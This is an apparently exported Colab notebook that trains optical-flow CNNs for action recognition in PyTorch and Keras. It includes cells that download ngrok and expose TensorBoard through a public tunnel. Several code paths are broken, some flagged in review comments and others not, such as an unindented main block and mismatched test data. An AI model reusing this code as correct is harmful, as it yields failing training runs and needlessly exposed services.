# + id="wf5ieEl6w1yh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="2ca3430a-08c3-430b-bb9d-359fd15976b7"
class Motion_CNN():
    """Second trainer variant for the motion-stream CNN.

    NOTE(review): this class defines no ``validate_1epoch``, yet ``run``
    calls it after each training epoch -- as written that raises
    AttributeError.  It also uses pre-0.4 PyTorch idioms (``Variable``,
    ``loss.data[0]``, ``.cuda(async=True)`` -- the latter a SyntaxError on
    Python >= 3.7) and globals from other cells (``resnet34``,
    ``ReduceLROnPlateau``, ``accuracy``, ``AverageMeter``,
    ``save_checkpoint``, ``record_info``).
    """
    def __init__(self, nb_epochs, lr, batch_size, resume, start_epoch, train_loader, test_loader, channel):
        # Store hyper-parameters and loaders verbatim; training state starts at 0.
        self.nb_epochs=nb_epochs
        self.lr=lr
        self.batch_size=batch_size
        self.resume=resume
        self.start_epoch=start_epoch
        #self.evaluate=evaluate
        self.train_loader=train_loader
        self.test_loader=test_loader
        self.best_prec1=0
        self.channel=channel
        #self.test_video=test_video
    def build_model(self):
        """Instantiate the network (resnet34 with a flow-channel stem), loss, optimizer, scheduler."""
        print ('==> Build model and setup loss and optimizer')
        #build model
        self.model = resnet34(pretrained= True, channel=self.channel).cuda()
        #print self.model
        #Loss function and optimizer
        self.criterion = nn.CrossEntropyLoss().cuda()
        self.optimizer = torch.optim.SGD(self.model.parameters(), self.lr, momentum=0.9)
        self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=1,verbose=True)
    # The block below is a string literal, i.e. commented-out resume logic
    # retained by the author; it is never executed.
    '''def resume_and_evaluate(self):
        if self.resume:
            if os.path.isfile(self.resume):
                print("==> loading checkpoint '{}'".format(self.resume))
                checkpoint = torch.load(self.resume)
                self.start_epoch = checkpoint['epoch']
                self.best_prec1 = checkpoint['best_prec1']
                self.model.load_state_dict(checkpoint['state_dict'])
                self.optimizer.load_state_dict(checkpoint['optimizer'])
                print("==> loaded checkpoint '{}' (epoch {}) (best_prec1 {})"
                  .format(self.resume, checkpoint['epoch'], self.best_prec1))
            else:
                print("==> no checkpoint found at '{}'".format(self.resume))
        """if self.evaluate:
            self.epoch=0
            prec1, val_loss = self.validate_1epoch()
            return"""'''
    def run(self):
        """Training driver: build the model, then train/validate per epoch."""
        self.build_model()
        #self.resume_and_evaluate()
        cudnn.benchmark = True
        for self.epoch in range(self.start_epoch, self.nb_epochs):
            self.train_1epoch()
            # NOTE(review): validate_1epoch is not defined on this class.
            prec1, val_loss = self.validate_1epoch()
            is_best = prec1 > self.best_prec1
            #lr_scheduler -- plateau scheduler keys off the validation loss
            self.scheduler.step(val_loss)
            # save model (video-level predictions pickled on improvement)
            if is_best:
                self.best_prec1 = prec1
                with open('best_weight.pickle','wb') as f:
                    pickle.dump(self.dic_video_level_preds,f)
                    f.close()
            save_checkpoint({
                'epoch': self.epoch,
                'state_dict': self.model.state_dict(),
                'best_prec1': self.best_prec1,
                'optimizer' : self.optimizer.state_dict()
            },is_best,'checkpoint.pth.tar','model_best.pth.tar')
    def train_1epoch(self):
        """One training epoch over ``self.train_loader``; logs to opf_train.csv."""
        print('==> Epoch:[{0}/{1}][training stage]'.format(self.epoch, self.nb_epochs))
        batch_time = AverageMeter()
        data_time = AverageMeter()
        losses = AverageMeter()
        top1 = AverageMeter()
        top5 = AverageMeter()
        #switch to train mode
        self.model.train()
        end = time.time()
        # mini-batch training
        progress = tqdm(self.train_loader)
        print(progress)
        for i, (data,label) in enumerate(progress):
            # measure data loading time
            data_time.update(time.time() - end)
            label = label.cuda(async=True)
            input_var = Variable(data).cuda()
            target_var = Variable(label).cuda()
            # compute output
            output = self.model(input_var)
            loss = self.criterion(output, target_var)
            # measure accuracy and record loss
            prec1, prec5 = accuracy(output.data, label, topk=(1, 5))
            losses.update(loss.data[0], data.size(0))
            top1.update(prec1[0], data.size(0))
            top5.update(prec5[0], data.size(0))
            # compute gradient and do SGD step
            self.optimizer.zero_grad()
            loss.backward()
            self.optimizer.step()
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
        info = {'Epoch':[self.epoch],
                'Batch Time':[round(batch_time.avg,3)],
                'Data Time':[round(data_time.avg,3)],
                'Loss':[round(losses.avg,5)],
                'Prec@1':[round(top1.avg,4)],
                'Prec@5':[round(top5.avg,4)],
                'lr': self.optimizer.param_groups[0]['lr']
                }
        record_info(info, 'opf_train.csv','train')
# + id="_ImSXFXPMeMy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 979} outputId="82581b4c-6833-4d33-b9fd-f0d110b66107"
model = Motion_CNN(
# Data Loader
train_loader=train_loader,
test_loader=val_loader,
# Utility
start_epoch=start_epoch,
resume=resume,
#evaluate=evaluate,
# Hyper-parameter
nb_epochs=epochs,
lr=lr,
batch_size=batch_size,
channel = 10*2,
#test_video=test_video
)
#Training
model.run()
# + id="ueRv2XSMZjmO" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="b53e9e30-0ff3-486b-95cb-904c9996b13c"
print(train_loader)
# + id="D-C60MV4RTY1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="5c7bb4cd-f3df-409f-8b46-a3a13daec2d0"
class AverageMeter(object):
    """Track current values and running means for one or more scalar metrics.

    `i` parallel meters are maintained; `update` accepts either a single
    scalar (when i == 1) or a list with one entry per meter, optionally
    weighted by a sample count `n`.
    """
    def __init__(self, i=1, precision=3):
        # number of parallel meters and the display precision for __repr__
        self.meters = i
        self.precision = precision
        self.reset(self.meters)
    def reset(self, i):
        """Zero all accumulators for `i` meters."""
        self.val = [0 for _ in range(i)]
        self.avg = [0 for _ in range(i)]
        self.sum = [0 for _ in range(i)]
        self.count = 0
    def update(self, val, n=1):
        """Record `val` (scalar or list, one entry per meter), weighted by `n`."""
        values = val if isinstance(val, list) else [val]
        assert(len(values) == self.meters)
        self.count += n
        for idx in range(len(values)):
            current = values[idx]
            self.val[idx] = current
            self.sum[idx] = self.sum[idx] + current * n
            self.avg[idx] = self.sum[idx] / self.count
    def __repr__(self):
        fmt = '{:.{}f}'
        current = ' '.join(fmt.format(v, self.precision) for v in self.val)
        running = ' '.join(fmt.format(a, self.precision) for a in self.avg)
        return '{} ({})'.format(current, running)
# + id="axN29v-ehdQF" colab_type="code" colab={}
def validate_1epoch(self):
    """Evaluate the model on `self.test_loader` for one epoch.

    Frame-level scores are accumulated per video into
    `self.dic_video_level_preds`, then reduced to video-level top-1/top-5
    accuracy and loss (via frame2_video_level_accuracy) and logged to
    'opf_test.csv'.

    :return: (video-level top-1 accuracy, video-level loss)
    """
    print('==> Epoch:[{0}/{1}][validation stage]'.format(self.epoch, self.nb_epochs))
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top5 = AverageMeter()
    # switch to evaluate mode
    self.model.eval()
    self.dic_video_level_preds={}
    end = time.time()
    progress = tqdm(self.test_loader)
    # torch.no_grad() replaces the removed `volatile=True` Variable flag;
    # `async` became a reserved keyword in Python 3.7 (the original
    # `.cuda(async=True)` is a SyntaxError there), so the argument is now
    # spelled `non_blocking`.
    with torch.no_grad():
        for i, (keys, data, label) in enumerate(progress):
            #data = data.sub_(127.353346189).div_(14.971742063)
            label = label.cuda(non_blocking=True)
            data_var = Variable(data).cuda(non_blocking=True)
            # compute output (labels are only consumed at video level, so the
            # unused label_var wrapper was dropped)
            output = self.model(data_var)
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
            # Calculate video level prediction: sum frame scores per video
            preds = output.data.cpu().numpy()
            nb_data = preds.shape[0]
            for j in range(nb_data):
                videoName = keys[j].split('-', 1)[0]  # e.g. ApplyMakeup_g01_c01
                if videoName not in self.dic_video_level_preds.keys():
                    self.dic_video_level_preds[videoName] = preds[j, :]
                else:
                    self.dic_video_level_preds[videoName] += preds[j, :]
    # Frame to video level accuracy
    video_top1, video_top5, video_loss = self.frame2_video_level_accuracy()
    info = {'Epoch':[self.epoch],
            'Batch Time':[round(batch_time.avg,3)],
            'Loss':[round(video_loss,5)],
            'Prec@1':[round(video_top1,3)],
            'Prec@5':[round(video_top5,3)]
            }
    record_info(info, 'opf_test.csv','test')
    return video_top1, video_loss
def frame2_video_level_accuracy(self):
    """Reduce the per-video score sums in `self.dic_video_level_preds` to
    video-level top-1/top-5 accuracy and cross-entropy loss.

    Labels come from `self.test_video` (video name -> 1-based class id).
    Returns (top1, top5, loss) with loss as a numpy scalar.
    """
    correct = 0
    # NOTE(review): 101 looks like the UCF101 class count, while other models
    # in this file use 7 classes — confirm this width matches the dataset.
    video_level_preds = np.zeros((len(self.dic_video_level_preds),101))
    video_level_labels = np.zeros(len(self.dic_video_level_preds))
    ii=0
    for key in sorted(self.dic_video_level_preds.keys()):
        # keys were already reduced to the bare video name when stored, so
        # this split is effectively a no-op safeguard (name == key)
        name = key.split('-',1)[0]
        preds = self.dic_video_level_preds[name]
        label = int(self.test_video[name])-1  # stored labels are 1-based
        video_level_preds[ii,:] = preds
        video_level_labels[ii] = label
        ii+=1
        if np.argmax(preds) == (label):
            correct+=1
    #top1 top5
    video_level_labels = torch.from_numpy(video_level_labels).long()
    video_level_preds = torch.from_numpy(video_level_preds).float()
    loss = self.criterion(Variable(video_level_preds).cuda(), Variable(video_level_labels).cuda())
    top1,top5 = accuracy(video_level_preds, video_level_labels, topk=(1,5))
    top1 = float(top1.numpy())
    top5 = float(top5.numpy())
    return top1,top5,loss.data.cpu().numpy()
# + id="qBR1w9g0hdMh" colab_type="code" colab={}
# + id="LzehzjNjhdJi" colab_type="code" colab={}
# + id="RkeA95SzhdGD" colab_type="code" colab={}
# + id="aOl4BVCZhdC4" colab_type="code" colab={}
# + id="axAQcpiBhc_7" colab_type="code" colab={}
# + id="kxhcq-bBhc82" colab_type="code" colab={}
# + id="svHKKl3hhc51" colab_type="code" colab={}
# + id="IQ_yCxBDhc2v" colab_type="code" colab={}
# + id="FH2shZM9DQTK" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 292} outputId="00d95b23-6118-4823-f1a2-a12a4115a8d1"
# !pip install git+https://github.com/wookayin/tensorflow-plot.git@master
# + id="77RTww7FBQse" colab_type="code" colab={}
import keras
from keras.layers import Input
from keras.layers import Dense
from keras.layers import Convolution2D
from keras.layers import MaxPooling2D
from keras.layers import BatchNormalization
from keras.layers import Activation
from keras.layers import Dropout
from keras.layers import Flatten
from keras.models import Model
import os
from PIL import Image
from keras import optimizers
from sklearn.cross_validation import train_test_split
from keras.callbacks import ModelCheckpoint
from keras.callbacks import TensorBoard
import tensorflow as tf
from textwrap import wrap
import itertools
import matplotlib
#import tfplot
import re
from keras.callbacks import Callback
run_opts = tf.RunOptions(report_tensor_allocations_upon_oom = True)
from keras import backend as K
K.clear_session()
# + id="xAgZcGUCBQsy" colab_type="code" colab={}
from keras.models import Sequential, load_model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Conv2D, MaxPooling2D
# + id="dyDSPWmLBQs5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="b9c5f59a-799a-426c-a66a-7ca389cba6b1"
def temporal_CNN(input_shape, classes, weights_dir, include_top=True):
    """Sequential CNN for stacked optical-flow input.

    :param input_shape: shape of the optical-flow stack, e.g. (216, 216, 20)
    :param classes: number of output classes for the softmax head
    :param weights_dir: unused here; kept for signature parity with the
        functional-API variant of this model defined later in the file
    :param include_top: unused here; kept for signature parity as well
    :return: an uncompiled keras Sequential model
    """
    model = Sequential()
    #conv1
    model.add(Conv2D(128, (5, 5), strides=2, padding='same', input_shape=input_shape))
    model.add(BatchNormalization())
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    #conv2
    model.add(Conv2D(256, (5, 5), strides=2, padding='same'))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    #conv3
    model.add(Conv2D(512, (3, 3), strides=1, activation='relu', padding='same'))
    #conv4
    model.add(Conv2D(512, (3, 3), strides=1, activation='relu', padding='same'))
    #conv5
    model.add(Conv2D(512, (3, 3), strides=1, activation='relu', padding='same'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    #full6
    model.add(Flatten())
    model.add(Dense(4096, activation='relu'))
    model.add(Dropout(0.9))
    #full7
    model.add(Dense(2048, activation='relu'))
    model.add(Dropout(0.9))
    # softmax head: use the `classes` parameter instead of the hard-coded 7
    # so the function honours its signature (call sites pass classes=7, so
    # existing behaviour is unchanged).
    model.add(Dense(classes, activation='softmax'))
    return model
# + id="MgpuYn0OD2vc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="f11b2dd0-8134-4c62-82f8-e1b6eb1494af"
# %cd HAR
# + id="EN3QXBATYN9J" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="c24ae3fe-d5c7-437d-c260-2887fba2eb17"
# !ls
# + id="7_HDGxCCcRzv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="859a745d-76c7-4b03-8c6b-ce95eb66c425"
LOG_DIR = 'logs'
get_ipython().system_raw(
'tensorboard --logdir {} --host 0.0.0.0 --port 6006 &'
.format(LOG_DIR)
)
# + id="LIAH4g9p0zWM" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="4d3c3acf-d0aa-4f9d-cf7b-74c445d47a46"
# ! curl http://localhost:6006
# + id="ljlvuNeSdqWH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="3b0e8478-dc87-4752-e88b-32444ab4d06c"
# !wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip > /dev/null 2>&1
# ! unzip ngrok-stable-linux-amd64.zip > /dev/null 2>&1
# + id="LOGe2Xa7dqdU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="9e96d54a-0f77-467a-a8a6-2c8ae347032f"
get_ipython().system_raw('./ngrok http 6006 &')
# + id="je47LzATdqat" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="2fc9beb6-9ece-49e8-d08e-6f2e2fcb4997"
# ! curl -s http://localhost:4040/api/tunnels | python3 -c \
# "import sys, json; print(json.load(sys.stdin)['tunnels'][0]['public_url'])"
# + id="pVnqqqf0BQst" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="d5d75381-1715-4066-db89-ea863bb32e16"
def temporal_CNN(input_shape, classes, weights_dir, include_top=True):
    '''
    The CNN for optical flow input (functional API version).
    Optical flow is not a natural image, so ImageNet-pretrained backbones are
    meaningless here and the network is trained from scratch.
    :param input_shape: the shape of the optical flow input
    :param classes: number of classes
    :param weights_dir: path to existing weights; loaded by name if present
    :param include_top: whether to append the softmax classification head
    :return: a keras Model
    '''
    optical_flow_input = Input(shape=input_shape)
    # (filters, kernel size, stride, pool-after?) for tmp_conv1 .. tmp_conv5;
    # every conv is followed by batch-norm + ReLU.
    conv_specs = [
        (96, 7, 2, True),
        (256, 5, 2, True),
        (512, 3, 2, False),
        (512, 3, 1, False),
        (512, 3, 1, True),
    ]
    x = optical_flow_input
    for idx, (filters, kernel, stride, pool_after) in enumerate(conv_specs, start=1):
        x = Convolution2D(filters, kernel_size=(kernel, kernel),
                          strides=(stride, stride), padding='same',
                          name='tmp_conv{}'.format(idx))(x)
        x = BatchNormalization(axis=3)(x)
        x = Activation('relu')(x)
        if pool_after:
            x = MaxPooling2D(pool_size=(2, 2))(x)
    # fully-connected head
    x = Flatten()(x)
    x = Dense(2048, activation='relu', name='tmp_fc6')(x)
    x = Dropout(0.9)(x)
    x = Dense(4096, activation='relu', name='tmp_fc7')(x)
    x = Dropout(0.9)(x)
    if include_top:
        x = Dense(classes, activation='softmax', name='tmp_fc101')(x)
    model = Model(inputs=optical_flow_input, outputs=x, name='temporal_CNN')
    # resume from existing weights when available (matched by layer name)
    if os.path.exists(weights_dir):
        model.load_weights(weights_dir, by_name=True)
    return model
# + id="tuXDRs87WgdJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1003} outputId="8487c808-2abd-4179-beae-2528efdd53e3"
if __name__ == '__main__':
input_shape = (216, 216, 20)
N_CLASSES = 7
model = temporal_CNN(input_shape, N_CLASSES, weights_dir='')
print(model.summary())
# + id="B1fCXeq0BQtF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="2db0280e-2b07-4086-f45f-ef954a125250"
# NOTE(review): `sgd` is constructed but never used — the Adam optimizer
# below is what gets passed to compile(); drop one once the choice is final.
sgd = optimizers.SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)
# Adam hyper-parameters
lr = 0.001
beta_1 = 0.9
beta_2 = 0.999
epsilon = 10 ** (-8)
optimizer = optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon)
# `options=run_opts` forwards tf.RunOptions so OOM errors report tensor allocations
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'],options = run_opts)
# + id="JlrJBnVjBQtN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="07e6044e-3175-4377-e359-390e3469b689"
import pandas as pd
import numpy as np
train = pd.read_csv("train.csv",index_col = 0)
test = pd.read_csv("test.csv",index_col=0)
#print (train.shape)
#print (test.shape)
train.reset_index()
test.reset_index()
train.index = range(train.shape[0])
test.index = range(test.shape[0])
#print(train.shape[0])
target = train['label']
features = train.drop('label',axis=1)
X_data = features['id']
y_data = target
# + id="JqaiFrsNBQtT" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="df8990c9-7730-4ca3-ff54-50f8be38975f"
# Generator configuration: the entire training set is produced as a single
# "batch" (batch_size == number of training rows).
dim = (216,216)
batch_size = X_data.shape[0]
n_classes = 7
n_channels = 20
shuffle = True
def data_generation(list_IDs_temp,labels):
    'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
    # Initialization; relies on the module-level dim / batch_size / n_channels
    X = np.empty((batch_size, *dim, n_channels))
    y = np.empty((batch_size), dtype=int)
    # Generate data
    for i, ID in enumerate(list_IDs_temp):
        #print(i,ID)
        # Store sample: each .npy file holds one stacked optical-flow sample
        X[i,] = np.load('data/' + ID )
        # Store class: labels are matched to IDs by position, which relies on
        # both Series sharing the same (reset) index order
        y[i] = labels[i]
    return X , keras.utils.to_categorical(y, num_classes=n_classes)
# + id="t_0_Pu1xU6s_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="316c4b2c-0a01-43cb-c825-7ef25193e7fa"
# !ls
# + id="Nwy94ZE5BQtb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="9759e6e1-6449-47e4-dabe-6490fce56f64"
# Datasets
partition = X_data
labels = y_data
#keras.utils.to_categorical(y, num_classes=n_classes)
# Generators
xData,yData = data_generation(partition,labels)
# + id="AtbcuYlqBQtr" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="c1588865-7203-4854-d503-e8dad4087e9c"
random_seed = 2
# A single train_test_split call keeps features and labels aligned by
# construction. The original made two separate calls that only stayed
# consistent because they shared the same random_state — fragile if either
# call's arguments ever diverge. The resulting split is identical.
trainData, testData, trainLabels, testLabels = train_test_split(
    xData, yData, test_size=0.2, random_state=random_seed)
# + id="DHN9dqbfBQt0" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a7a805d0-d97b-4175-91cb-bbfcecd9375d"
trainData.shape,testData.shape
# + id="4HiI1IAuBQuw" colab_type="code" colab={}
class SensitivitySpecificityCallback(Callback):
    """Keras callback that renders a confusion-matrix image into the
    TensorBoard 'logs/image' directory after every epoch, computed from the
    model's validation data (TF1-style session/summary APIs)."""
    def on_epoch_end(self, epoch, logs=None):
        # Fixed rendering options; normalize=False means raw counts are shown.
        normalize=False
        title='Confusion matrix'
        tensor_name = 'image'
        session=tf.Session()
        img_d_summary_dir = os.path.join('logs', "image")
        img_d_summary_writer = tf.summary.FileWriter(img_d_summary_dir, session.graph)
        # validation_data is (inputs, one-hot labels, ...) supplied by fit()
        x_test = self.validation_data[0]
        y_test = self.validation_data[1]
        #print(y_test)
        # x_test, y_test = self.validation_data
        predictions = self.model.predict(x_test)
        #print(predictions)
        # collapse one-hot labels / score vectors to class indices
        y_test = np.argmax(y_test, axis=-1)
        predictions = np.argmax(predictions, axis=-1)
        #c = confusion_matrix(y_test, predictions)
        correct_labels = y_test
        predict_labels = predictions
        conf = tf.contrib.metrics.confusion_matrix(correct_labels, predict_labels)
        cm=session.run(conf)
        if normalize:
            # NOTE(review): the *10 factor looks like a typo for *100
            # (percentages); unreachable while normalize=False above.
            cm = cm.astype('float')*10 / cm.sum(axis=1)[:, np.newaxis]
            cm = np.nan_to_num(cm, copy=True)
            cm = cm.astype('int')
        np.set_printoptions(precision=2)
        fig = matplotlib.figure.Figure(figsize=(7, 7), dpi=320, facecolor='w', edgecolor='k')
        ax = fig.add_subplot(1, 1, 1)
        im = ax.imshow(cm, cmap='Oranges')
        #classes = [re.sub(r'([a-z](?=[A-Z])|[A-Z](?=[A-Z][a-z]))', r'\1 ', x) for x in labels]
        #classes = ['\n'.join(wrap(l, 40)) for l in classes]
        # NOTE(review): 'Run' appears twice — the last entry is likely meant
        # to be a seventh distinct action class; confirm against the dataset.
        classes = ['Bend','Hand-wave','Jump-in-place','Pull','Run','Sit-stand-up','Run']
        tick_marks = np.arange(len(classes))
        ax.set_xlabel('Predicted', fontsize=7)
        ax.set_xticks(tick_marks)
        c = ax.set_xticklabels(classes, fontsize=10, rotation=-90,  ha='center')
        ax.xaxis.set_label_position('bottom')
        ax.xaxis.tick_bottom()
        ax.set_ylabel('True Label', fontsize=7)
        ax.set_yticks(tick_marks)
        ax.set_yticklabels(classes, fontsize=10, va ='center')
        ax.yaxis.set_label_position('left')
        ax.yaxis.tick_left()
        # annotate each cell with its count ('.' for zero to reduce clutter)
        for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
            ax.text(j, i, format(cm[i, j], 'd') if cm[i,j]!=0 else '.', horizontalalignment="center", fontsize=6, verticalalignment='center', color= "black")
        fig.set_tight_layout(True)
        # NOTE(review): tfplot is referenced here but its import is commented
        # out near the top of the file — re-enable before using this callback.
        summary = tfplot.figure.to_summary(fig, tag=tensor_name)
        img_d_summary_writer.add_summary(summary)
        img_d_summary_writer.flush()
        img_d_summary_writer.close()
        #return summary
# + id="JANIGxvjBQut" colab_type="code" colab={}
class TrainValTensorBoard(TensorBoard):
    """TensorBoard callback that writes training and validation scalars to
    separate subdirectories ('training' / 'validation') under one log dir,
    so both curves can be overlaid on the same TensorBoard chart."""
    def __init__(self, log_dir='./logs', **kwargs):
        # Make the original `TensorBoard` log to a subdirectory 'training'
        training_log_dir = os.path.join(log_dir, 'training')
        super(TrainValTensorBoard, self).__init__(training_log_dir, **kwargs)
        # Log the validation metrics to a separate subdirectory
        self.val_log_dir = os.path.join(log_dir, 'validation')
        #self.img_d_summary_dir = os.path.join(log_dir, "image")
    def set_model(self, model):
        # Setup writer for validation metrics
        self.val_writer = tf.summary.FileWriter(self.val_log_dir)
        #self.img_d_summary_writer = tf.summary.FileWriter(self.img_d_summary_dir)
        super(TrainValTensorBoard, self).set_model(model)
    def on_epoch_end(self, epoch, logs=None):
        # Pop the validation logs and handle them separately with
        # `self.val_writer`. Also rename the keys (strip the 'val_' prefix)
        # so that 'val_loss' lines up with 'loss' on the same figure.
        #img_d_summary = TrainValTensorBoard.plot_confusion_matrix(correct_labels, predict_labels, labels, tensor_name='image')
        logs = logs or {}
        val_logs = {k.replace('val_', ''): v for k, v in logs.items() if k.startswith('val_')}
        for name, value in val_logs.items():
            summary = tf.Summary()
            summary_value = summary.value.add()
            summary_value.simple_value = value.item()
            summary_value.tag = name
            self.val_writer.add_summary(summary, epoch)
            #self.img_d_summary_writer.add_summary(img_d_summary, epoch)
        self.val_writer.flush()
        #self.img_d_summary_writer.flush()
        # Pass the remaining (training) logs to `TensorBoard.on_epoch_end`
        logs = {k: v for k, v in logs.items() if not k.startswith('val_')}
        super(TrainValTensorBoard, self).on_epoch_end(epoch, logs)
    def on_train_end(self, logs=None):
        # close the extra validation writer after the parent cleans up
        super(TrainValTensorBoard, self).on_train_end(logs)
        self.val_writer.close()
# + id="Fa2Rw6sASK9P" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="354f11d3-bdb9-4625-852c-9b25e9c47cc9"
hist = model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="yQynCJDdNSSG" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 393} outputId="92a256b7-31d4-4336-fd9b-b30591bf6c70"
import matplotlib.pyplot as plt
history = hist
print(history.history.keys())
plt.figure(1)
# summarize history for accuracy
plt.subplot(211)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
# summarize history for loss
plt.subplot(212)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# + id="w39-37uhalV_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 393} outputId="dce6ee50-0fb1-41ad-ee98-cf303eba07c8"
import matplotlib.pyplot as plt
history = hist
print(history.history.keys())
plt.figure(1)
# summarize history for accuracy
plt.subplot(211)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
# summarize history for loss
plt.subplot(212)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# + id="TB0O8GwwIQnZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="c07e9aaa-09c6-4f8e-cf4d-6b8047427ed6"
model.save_weights('ep200.h5')
# + id="hrLTa6cEBQu5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 3454} outputId="9a8bab22-607a-49a8-a347-0ede67c530eb"
hist = model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="a9RSQywJBQt-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="93669684-b995-4671-aa46-5d27b5912f2b"
from keras.preprocessing.image import ImageDataGenerator
batch_size = 32
gen = ImageDataGenerator(
horizontal_flip= True
)
train_gen = gen.flow(trainData, trainLabels, batch_size=batch_size)
test_gen = gen.flow(testData, testLabels)
# + id="t-JDH3L9BQuo" colab_type="code" colab={} outputId="7990e4bf-61e4-4201-8f94-88fd5ee90ffb"
hist = model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100)
# + id="mrnS4LRDBQuJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="12149faf-574f-4473-da58-dd19dd392de9"
dim = (216,216)
batch_size = test.shape[0]
n_classes = 7
n_channels = 20
shuffle = True
def data_generation_test(list_IDs_temp):
    """Load the pre-computed optical-flow stacks for the given test IDs.

    Relies on the module-level `batch_size`, `dim` and `n_channels` set in
    the preceding cell (batch_size == number of test rows, so every ID fits).

    :param list_IDs_temp: iterable of .npy file names
    :return: array of shape (batch_size, *dim, n_channels)
    """
    # Initialization; the unused label array `y` from the training generator
    # was dropped — the test set has no labels to collect here.
    X = np.empty((batch_size, *dim, n_channels))
    # NOTE(review): this reads from 'F://data/' while the training generator
    # reads from 'data/' — confirm which location holds the test arrays.
    for i, ID in enumerate(list_IDs_temp):
        # Store sample
        X[i,] = np.load('F://data/' + ID)
    return X
# + id="jq69mhnZBQuO" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1523} outputId="e34fb91e-00b4-4a1f-955c-d3926abdefd1"
test_data = test['id']
print(test)
#test_data.shape
testData = data_generation_test(test_data)
# + id="3yLciw2UBQuR" colab_type="code" colab={} outputId="3105d30d-6872-461f-d8b6-cd5ab407b08e"
model.fit(trainData , trainLabels, validation_data=(testData , testLabels),batch_size=32, epochs=100) # ,callbacks=callbacks_list, verbose=0)
# + id="b-aZIaLmBQug" colab_type="code" colab={} outputId="d3f1f3fe-223b-47b3-8541-fd77f99da556"
#filepath="weights-improvement-{epoch:02d}-{val_acc:.2f}.hdf5"
#checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')
#callbacks_list = [checkpoint]
# Fit the model
model.fit(train_gen, validation_data=(test_gen),batch_size=32, epochs=100) # ,callbacks=callbacks_list, verbose=0)
# + id="BiNw48NVBQu1" colab_type="code" colab={}
model.save_weights("ep300over.h5")
# + id="KedCDooHBQu_" colab_type="code" colab={} outputId="7ccc8079-7e2b-4d82-951f-0901b214a458"
model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="GzSE8LcrBQvG" colab_type="code" colab={} outputId="cd76cf68-e574-4f03-8fbd-97b7bd26eafb"
